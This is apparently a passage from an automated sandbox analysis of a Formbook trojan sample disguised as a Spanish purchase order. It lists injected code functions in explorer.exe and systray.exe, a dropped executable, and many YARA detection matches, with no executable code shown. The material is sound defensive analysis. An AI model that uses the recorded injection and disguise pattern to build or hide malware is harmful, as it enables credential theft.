          Source: C:\Windows\explorer.exeCode function: 10_2_1046EB3010_2_1046EB30
          Source: C:\Windows\explorer.exeCode function: 10_2_104775CD10_2_104775CD
          Source: C:\Windows\explorer.exeCode function: 10_2_10ABC08210_2_10ABC082
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC503610_2_10AC5036
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC95CD10_2_10AC95CD
          Source: C:\Windows\explorer.exeCode function: 10_2_10ABDD0210_2_10ABDD02
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC391210_2_10AC3912
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC623210_2_10AC6232
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC0B3010_2_10AC0B30
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC0B3210_2_10AC0B32
          Source: C:\Windows\explorer.exeCode function: 10_2_10C0608210_2_10C06082
          Source: C:\Windows\explorer.exeCode function: 10_2_10C0F03610_2_10C0F036
          Source: C:\Windows\explorer.exeCode function: 10_2_10C135CD10_2_10C135CD
          Source: C:\Windows\explorer.exeCode function: 10_2_10C07D0210_2_10C07D02
          Source: C:\Windows\explorer.exeCode function: 10_2_10C0D91210_2_10C0D912
          Source: C:\Windows\explorer.exeCode function: 10_2_10C1023210_2_10C10232
          Source: C:\Windows\explorer.exeCode function: 10_2_10C0AB3010_2_10C0AB30
          Source: C:\Windows\explorer.exeCode function: 10_2_10C0AB3210_2_10C0AB32
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 11_2_04B3558811_2_04B35588
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 11_2_04B3E52011_2_04B3E520
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 11_2_04B34D1811_2_04B34D18
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 11_2_04B3557911_2_04B35579
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 11_2_04B348E011_2_04B348E0
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 11_2_04B3515011_2_04B35150
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 11_2_04B3727811_2_04B37278
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C1E4F614_2_04C1E4F6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2244614_2_04C22446
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C1442014_2_04C14420
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C3059114_2_04C30591
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7053514_2_04B70535
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B8C6E014_2_04B8C6E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B6C7C014_2_04B6C7C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7077014_2_04B70770
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B9475014_2_04B94750
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C0200014_2_04C02000
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C281CC14_2_04C281CC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C241A214_2_04C241A2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C301AA14_2_04C301AA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B6010014_2_04B60100
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C0A11814_2_04C0A118
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BF815814_2_04BF8158
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BF02C014_2_04BF02C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C1027414_2_04C10274
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C303E614_2_04C303E6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7E3F014_2_04B7E3F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2A35214_2_04C2A352
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B60CF214_2_04B60CF2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C10CB514_2_04C10CB5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B70C0014_2_04B70C00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B88DBF14_2_04B88DBF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B6ADE014_2_04B6ADE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7AD0014_2_04B7AD00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C0CD1F14_2_04C0CD1F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2EEDB14_2_04C2EEDB
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B82E9014_2_04B82E90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2CE9314_2_04C2CE93
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2EE2614_2_04C2EE26
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B70E5914_2_04B70E59
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BEEFA014_2_04BEEFA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7CFE014_2_04B7CFE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B62FC814_2_04B62FC8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B90F3014_2_04B90F30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BB2F2814_2_04BB2F28
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C12F3014_2_04C12F30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BE4F4014_2_04BE4F40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B568B814_2_04B568B8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B9E8F014_2_04B9E8F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7284014_2_04B72840
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7A84014_2_04B7A840
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B729A014_2_04B729A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C3A9A614_2_04C3A9A6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B8696214_2_04B86962
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B6EA8014_2_04B6EA80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C26BD714_2_04C26BD7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2AB4014_2_04C2AB40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B6146014_2_04B61460
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2F43F14_2_04C2F43F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C0D5B014_2_04C0D5B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2757114_2_04C27571
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C216CC14_2_04C216CC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BB563014_2_04BB5630
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2F7B014_2_04C2F7B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C1F0CC14_2_04C1F0CC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2F0E014_2_04C2F0E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C270E914_2_04C270E9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B770C014_2_04B770C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7B1B014_2_04B7B1B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C3B16B14_2_04C3B16B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B5F17214_2_04B5F172
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA516C14_2_04BA516C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B752A014_2_04B752A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C112ED14_2_04C112ED
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B8B2C014_2_04B8B2C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BB739A14_2_04BB739A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2132D14_2_04C2132D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B5D34C14_2_04B5D34C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2FCF214_2_04C2FCF2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BE9C3214_2_04BE9C32
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B8FDC014_2_04B8FDC0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C21D5A14_2_04C21D5A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C27D7314_2_04C27D73
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B73D4014_2_04B73D40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B79EB014_2_04B79EB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B71F9214_2_04B71F92
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2FFB114_2_04C2FFB1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2FF0914_2_04C2FF09
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B738E014_2_04B738E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BDD80014_2_04BDD800
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C0591014_2_04C05910
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7995014_2_04B79950
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B8B95014_2_04B8B950
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C1DAC614_2_04C1DAC6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BB5AA014_2_04BB5AA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C11AA314_2_04C11AA3
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C0DAAC14_2_04C0DAAC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C27A4614_2_04C27A46
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2FA4914_2_04C2FA49
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BE3A6C14_2_04BE3A6C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B8FB8014_2_04B8FB80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BADBF914_2_04BADBF9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BE5BF014_2_04BE5BF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2FB7614_2_04C2FB76
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EEB7114_2_029EEB71
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EDE5F14_2_029EDE5F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029D9E6014_2_029D9E60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029D2FB014_2_029D2FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029D2D9014_2_029D2D90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029D2D8814_2_029D2D88
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0497A03614_2_0497A036
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0497E5CD14_2_0497E5CD
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04972D0214_2_04972D02
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0497108214_2_04971082
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0497891214_2_04978912
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0497B23214_2_0497B232
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04975B3214_2_04975B32
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04975B3014_2_04975B30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 018A5130 appears 58 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 018EF290 appears 105 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 018DEA12 appears 86 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 018B7E54 appears 111 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0185B970 appears 280 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04BEF290 appears 105 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04BB7E54 appears 111 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04BDEA12 appears 86 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04B5B970 appears 280 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04BA5130 appears 58 times
          Source: Orden de compra 0307AR24.exeStatic PE information: invalid certificate
          Source: Orden de compra 0307AR24.exe, 00000000.00000002.2164458182.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs Orden de compra 0307AR24.exe
          Source: Orden de compra 0307AR24.exe, 00000000.00000000.2087208512.0000000000A72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKoCj.exe\ vs Orden de compra 0307AR24.exe
          Source: Orden de compra 0307AR24.exe, 00000000.00000002.2171498759.0000000008F00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs Orden de compra 0307AR24.exe
          Source: Orden de compra 0307AR24.exe, 00000000.00000002.2162926053.000000000120E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Orden de compra 0307AR24.exe
          Source: Orden de compra 0307AR24.exe, 00000000.00000002.2167456218.0000000004DA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Orden de compra 0307AR24.exe
          Source: Orden de compra 0307AR24.exe, 00000000.00000002.2165242288.000000000477E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Orden de compra 0307AR24.exe
          Source: Orden de compra 0307AR24.exeBinary or memory string: OriginalFilenameKoCj.exe\ vs Orden de compra 0307AR24.exe
          Source: Orden de compra 0307AR24.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.4559239704.000000001048C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Orden de compra 0307AR24.exe PID: 2572, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: RegSvcs.exe PID: 7232, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
          Source: Process Memory Space: RggSaCWUvAyNK.exe PID: 7360, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: systray.exe PID: 7508, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
